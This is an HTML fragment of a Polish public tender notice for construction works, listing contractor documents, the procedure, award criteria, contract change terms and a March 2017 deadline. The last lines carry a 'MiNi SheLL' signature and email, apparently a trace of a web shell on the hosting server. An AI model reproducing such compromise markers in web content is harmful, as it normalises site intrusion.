              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />a)wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty,
b)wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami,
c)w celu oceny, czy wykonawca polegając na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy Pzp, będzie dysponował niezbędnymi zasobami w stopniu umożliwiającym należyte wykonanie zamówienia publicznego oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, Zamawiający żąda dokumentów, które określają w szczególności: 
a)zakres dostępnych Wykonawcy zasobów innego podmiotu,
b)sposób wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy
wykonywaniu zamówienia,
c)zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia.
d)czy podmiot, na zdolnościach którego wykonawca polega w odniesieniu do    
warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy PZP, przekaże Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy PZP (wzór oświadczenia stanowi załącznik nr 7 do SIWZ.Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin płatności</td><td>10</td></tr><tr><td>okres gwarancji</td><td>30</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.	Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności takiej zmiany.
2.	Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, z zastrzeżeniem pkt. 3.
3.	Zmiany zawartej umowy mogą nastąpić w szczególności w przypadku: 
1)	wystąpienia okoliczności skutkujących potrzebą zmiany przedmiotu lub umówionego terminu wykonania zamówienia:
a)  z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia, proponowanych przez Zamawiającego lub Wykonawcę: 
b)     z powodu istotnych braków lub błędów w dokumentacji projektowej, również tych polegających na niezgodności dokumentacji z przepisami prawa;
c)   z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron umowy;
d)  z powodu okoliczności siły wyższej, np: 
- wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, których nie można było przewidzieć z pewnością, w szczególności zagrażających bezpośrednio życiu lub zdrowiu ludzi lub grożących powstaniem szkody o znacznych rozmiarach;
- wystąpienia niesprzyjających warunków atmosferycznych uniemożliwiających prowadzenie robót z zachowaniem wymogów technologicznych;	
2)	wystąpienia okoliczności skutkujące zmianą podwykonawcy lub całkowitą rezygnacją z podwykonawstwa;
3)	wystąpienia okoliczności powodujących zwiększenie lub zmniejszenie kosztów wykonania umowy po stronie Wykonawcy z powodu ustawowej zmiany stawki podatku od towarów i usług (VAT); 
4)	wystąpienia zmiany wynagrodzenia, wynikającej ze sposobu rozliczenia opisanego w  § 11 umowy; 
5)	wystąpienia konieczności zmiany osób, danych kontaktowych lub adresów stron wskazanych w niniejszej umowie, w szczególności:
a)  z powodu zdarzeń losowych wywołanych okolicznościami niemożliwymi do 
     przewidzenia przed zawarciem umowy;
b)  z  powodu zmian kadrowych;
c)  wystąpienia okoliczności skutkujących potrzebą zmian organizacyjnych stron, np. 
     zmiana reprezentacji lub adresu siedziby strony umowy.

4.	Zmiany umowy, o których mowa w ust.3 mogą być wprowadzone  z zachowaniem następujących warunków: 
1)  wniosek o dokonanie zmiany umowy, zawierający uzasadnienie zmiany należy złożyć w formie pisemnej,
2)  ocenę zasadności zmiany  należy dokonać  po zapoznaniu się z uzasadnieniem i przy uwzględnieniu okoliczności sprawy,
3)  wszelkie zmiany umowy mogą być dokonywane z zachowaniem warunku, o którym mowa w pktt.1.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 14/03/2017, godzina: 11:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />1.W prowadzonym postępowaniu: 1)osobą uprawnioną przez Zamawiającego do porozumiewania się z Wykonawcami jest: a) w kwestiach formalnych  Marek Kurzawa, Ewa Tomczak, b) w kwestiach merytorycznych  Daniel Wieczorek; 2) zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy; 2. Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, ogólne warunki umowy zostały określone we wzorze umowy stanowiącym zał. nr 3 do SIWZ. 3. Wszelkie zawiadomienia, oświadczenia, wnioski oraz informacje przekazane za pomocą faksu lub w formie elektronicznej wymagają na żądanie każdej ze stron, niezwłocznego potwierdzenia faktu ich otrzymania. </div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com